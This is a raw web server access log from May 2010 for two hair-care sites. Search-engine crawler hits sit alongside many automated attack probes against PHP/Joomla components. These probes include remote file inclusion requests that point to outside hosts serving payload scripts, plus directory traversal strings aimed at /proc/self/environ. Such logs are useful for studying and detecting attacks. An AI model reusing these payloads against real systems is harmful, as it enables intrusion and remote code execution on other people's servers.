111.89.128.186 - - [16/May/2010:20:07:46 -0700] "GET /logs/access_100322.logcomponents/com_sitemap/sitemap.php?mosConfig_admin_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.115.213.158 - - [16/May/2010:20:13:52 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:13:52 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:13:52 -0700] "GET /logs/access.log//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:24:44 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:24:44 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:24:45 -0700] "GET /logs/access.log%20%20//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
211.115.213.158 - - [16/May/2010:20:25:08 -0700] "GET /components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [16/May/2010:20:25:10 -0700] "GET /logs/access_100405.log%20%20//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.115.213.158 - - [16/May/2010:20:25:11 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.16.34.178 - - [16/May/2010:20:25:34 -0700] "GET /logs/access_100412.log%20%20//modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.16.34.178 - - [16/May/2010:20:25:34 -0700] "GET /logs//modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.16.34.178 - - [16/May/2010:20:25:34 -0700] "GET /modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.7.113 - - [16/May/2010:20:26:05 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14069 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
189.16.34.178 - - [16/May/2010:20:30:46 -0700] "GET /logs/access_100412.log//modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.16.34.178 - - [16/May/2010:20:30:46 -0700] "GET /modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
189.16.34.178 - - [16/May/2010:20:30:46 -0700] "GET /logs//modules/errors.php?error=http://pixain.sitebr.net/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.195.114.238 - - [16/May/2010:20:45:30 -0700] "GET /tmp/?D=D HTTP/1.0" 200 643 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.freehairsecrets.com"
84.40.30.37 - - [16/May/2010:20:51:16 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:20:51:16 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:20:51:16 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:20:51:21 -0700] "GET /index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:20:51:21 -0700] "GET /logs/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:20:51:21 -0700] "GET /logs/access_100412.log%20%20/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [16/May/2010:20:51:43 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13410 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.19.79.209 - - [16/May/2010:20:54:59 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "growlonghairfast.com"
81.19.79.209 - - [16/May/2010:21:00:26 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "StackRambler/2.0 (MSIE incompatible)" "www.freehairsecrets.com"
84.40.30.37 - - [16/May/2010:21:01:29 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:01:29 -0700] "GET /logs/access_100315.log%20%20/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:01:29 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:01:39 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:01:39 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:01:39 -0700] "GET /logs/access_100315.log%20%20/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.66.249 - - [16/May/2010:21:02:22 -0700] "GET /components/com_flyspray/startdown.php?file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
212.227.66.249 - - [16/May/2010:21:02:22 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.freehairsecrets.com"
84.40.30.37 - - [16/May/2010:21:05:29 -0700] "GET /logs/access_100315.log/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:05:29 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:05:29 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:05:33 -0700] "GET /logs/access_100315.log/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:05:33 -0700] "GET /?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
84.40.30.37 - - [16/May/2010:21:05:33 -0700] "GET /logs/?_zb_path=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
212.227.66.249 - - [16/May/2010:21:06:50 -0700] "GET /logs/access_100426.log/components/com_flyspray/startdown.php?file=http://fedr.interfree.it/id.jpg?? HTTP/1.0" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.227.66.249 - - [16/May/2010:21:06:50 -0700] "GET /components/com_flyspray/startdown.php?file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
212.227.66.249 - - [16/May/2010:21:06:50 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.208.200 - - [16/May/2010:21:07:04 -0700] "GET /admin.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "www.freehairsecrets.com"
208.115.208.200 - - [16/May/2010:21:07:06 -0700] "GET /admin.php?option=com_admin&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.810" "growlonghairfast.com"
195.20.225.28 - - [16/May/2010:21:07:43 -0700] "GET /logs/access_100405.log/include/write.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.20.225.28 - - [16/May/2010:21:07:43 -0700] "GET /include/write.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
195.20.225.28 - - [16/May/2010:21:07:43 -0700] "GET /logs//include/write.php?dir=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
91.206.183.174 - - [16/May/2010:21:21:04 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
91.206.183.174 - - [16/May/2010:21:21:04 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; Win64; AMD64)" "growlonghairfast.com"
66.249.65.82 - - [16/May/2010:21:34:20 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "growlonghairfast.com"
220.181.7.112 - - [16/May/2010:21:37:50 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13519 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
77.88.25.28 - - [16/May/2010:21:39:48 -0700] "GET /freehairsecretsphp/viewtopic.php?p=3130 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
81.21.79.214 - - [16/May/2010:21:41:57 -0700] "GET /logs/access.log/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
81.21.79.214 - - [16/May/2010:21:41:57 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
81.21.79.214 - - [16/May/2010:21:41:57 -0700] "GET /logs/index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" "www.freehairsecrets.com"
77.88.25.28 - - [16/May/2010:21:53:06 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13364 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
88.191.94.188 - - [16/May/2010:21:56:52 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.246.8.71 - - [16/May/2010:21:57:56 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.69" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:04 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:04 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:04 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:05 -0700] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:05 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
88.191.94.188 - - [16/May/2010:22:01:05 -0700] "GET /logs/access.log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
195.246.8.71 - - [16/May/2010:22:11:48 -0700] "GET /logs/access.log/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.69" "www.freehairsecrets.com"
195.246.8.71 - - [16/May/2010:22:11:49 -0700] "GET /?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.69" "www.freehairsecrets.com"
195.246.8.71 - - [16/May/2010:22:11:49 -0700] "GET /logs/?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 5371 "-" "libwww-perl/5.69" "www.freehairsecrets.com"
67.195.112.151 - - [16/May/2010:22:16:26 -0700] "GET /logs/access_091130.log HTTP/1.0" 200 674055 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:16:29 -0700] "GET /Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:16:36 -0700] "GET /logs/access_100208.log%20%20//Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:16:36 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:17:27 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:17:27 -0700] "GET /logs/access_100208.log//Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.194.3 - - [16/May/2010:22:17:27 -0700] "GET /Neos_Chronos/header.php?base_folder=http://christenplein.com/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.202.24.236 - - [16/May/2010:22:18:46 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
67.202.24.236 - - [16/May/2010:22:18:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=17323 HTTP/1.1" 200 349 "-" "Mozilla/5.0 (compatible; spbot/2.0.2; +http://www.seoprofiler.com/bot/ )" "growlonghairfast.com"
77.88.25.28 - - [16/May/2010:22:20:40 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12885 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
67.195.112.151 - - [16/May/2010:22:23:23 -0700] "GET /logs/access_100222.log HTTP/1.0" 200 3322730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.112.151 - - [16/May/2010:22:25:01 -0700] "GET /logs/access_100222.log HTTP/1.0" 200 3322730 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
207.46.13.133 - - [16/May/2010:22:27:21 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
207.46.13.133 - - [16/May/2010:22:29:20 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6205 HTTP/1.1" 200 349 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "growlonghairfast.com"
66.249.65.66 - - [16/May/2010:22:32:49 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "www.growlonghairfast.com"
88.250.57.232 - - [16/May/2010:22:38:44 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "-" "Wget/1.11.4" "www.freehairsecrets.com"
69.175.35.82 - - [16/May/2010:22:40:11 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
69.175.35.82 - - [16/May/2010:22:40:11 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
88.250.57.232 - - [16/May/2010:22:40:17 -0700] "GET /logs/access_100517.log HTTP/1.0" 200 3119686 "-" "Wget/1.11.4" "growlonghairfast.com"
69.175.35.82 - - [16/May/2010:22:44:41 -0700] "GET /logs/access_100503.log/components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://fedr.interfree.it/id.jpg?? HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
220.181.7.109 - - [16/May/2010:22:49:39 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13268 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "www.freehairsecrets.com"
91.121.71.175 - - [16/May/2010:22:50:50 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:22:50:50 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:22:50:50 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.193.75 - - [16/May/2010:22:50:55 -0700] "GET /freehairsecretsphp/viewtopic.php HTTP/1.1" 200 128 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
91.121.71.175 - - [16/May/2010:22:51:35 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:22:51:35 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:22:51:35 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
119.63.193.75 - - [16/May/2010:22:52:55 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6472 HTTP/1.1" 200 349 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
64.251.10.117 - - [16/May/2010:22:57:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:22:57:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
121.190.102.21 - - [16/May/2010:22:59:51 -0700] "GET /?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 200 926 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [16/May/2010:22:59:52 -0700] "GET /logs/?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 200 5371 "-" "Mozilla/5.0" "growlonghairfast.com"
121.190.102.21 - - [16/May/2010:22:59:52 -0700] "GET /logs/access_100125.log%20%20/?_zb_path=http://sabong.es.kr/~sb2007/bbs/data/grade4/1259283009/a.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:00 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:00 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:00 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:14 -0700] "GET /skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:14 -0700] "GET /logs//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.221.130.2 - - [16/May/2010:23:02:14 -0700] "GET /logs/access_100405.log%20%20//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
198.170.141.58 - - [16/May/2010:23:02:49 -0700] "GET /index.php?option=com_artforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
211.232.85.247 - - [16/May/2010:23:02:52 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://liceum3.ru/help/sh/idsuper.txt???? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
64.251.10.117 - - [16/May/2010:23:08:27 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:23:08:27 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:23:08:27 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:23:08:28 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:23:08:28 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
64.251.10.117 - - [16/May/2010:23:08:28 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.freehairsecrets.com"
91.121.71.175 - - [16/May/2010:23:11:01 -0700] "GET /logs/access_100329.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.71.175 - - [16/May/2010:23:11:58 -0700] "GET /logs/access_100329.log//skin/uks_gallery_v3010/write.php?dir=http://forum.c4evn.org/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
